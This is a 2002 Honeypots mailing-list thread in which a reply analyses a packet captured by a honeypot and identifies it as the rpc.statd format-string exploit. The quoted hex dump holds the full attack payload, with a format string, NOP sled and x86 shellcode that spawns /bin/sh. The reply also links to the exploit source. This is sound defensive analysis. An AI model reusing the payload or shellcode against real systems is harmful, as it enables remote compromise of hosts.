Honeypots mailing list archives
Re: statd exploit ???
From: Chris Reining <creining () packetfu org>
Date: Wed, 30 Oct 2002 18:08:40 -0600
Sriram, The first packet has classic signs of the statd exploit. The string "/bin|c74604|/sh" is present in the latter part of the datagram. This translates to the hex string 62 69 6E C7 46 04 2F 73 68 in your packet. Broken up you have 62 69 6E which is bin, C7 46 04, and then 2F 73 68 which is /sh. Refer arachNIDS - http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids442 Sploit - http://packetstormsecurity.nl/0008-exploits/statdx.c Chris On Wed, 30 Oct 2002 16:29:35 -0600 "Sriram Newsgroups" <srinews () hotmail com> wrote:
My honeypt recorded this packet. It looks to be a statd exploit (port 32768). I can't narrow it down to what exactly this exploit does or its nature. Here is the sample packet 10/25-17:41:34.464523 24.123.46.10:847 -> x.x.x.linux:32768 UDP TTL:47 TOS:0x0 ID:51930 IpLen:20 DgmLen:1104 Len: 1084 51 1B 5D 1C 00 00 00 00 00 00 00 02 00 01 86 B8 Q.]............. 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3D B9 D6 3B 00 00 00 09 6C 6F 63 61 6C 68 6F 73 =..;....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68 x%8x%8x%62716x%h 6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90 n%51859x%hn..... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ -------------------------- Reapeted 41 lines --------------------- 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... My honeypot replied with this 10/25-17:41:34.468306 x.x.x.linux:32768 -> 24.123.46.10:847 UDP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF Len: 40 51 1B 5D 1C 00 00 00 01 00 00 00 00 00 00 00 00 Q.]............. 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2F .............../ Any ideas ???? Sriram
Current thread:
- statd exploit ??? Sriram Newsgroups (Oct 30)
- Re: statd exploit ??? Jamie (Oct 30)
- Re: statd exploit ??? Chris Reining (Oct 30)
- Re: statd exploit ??? mike (Oct 30)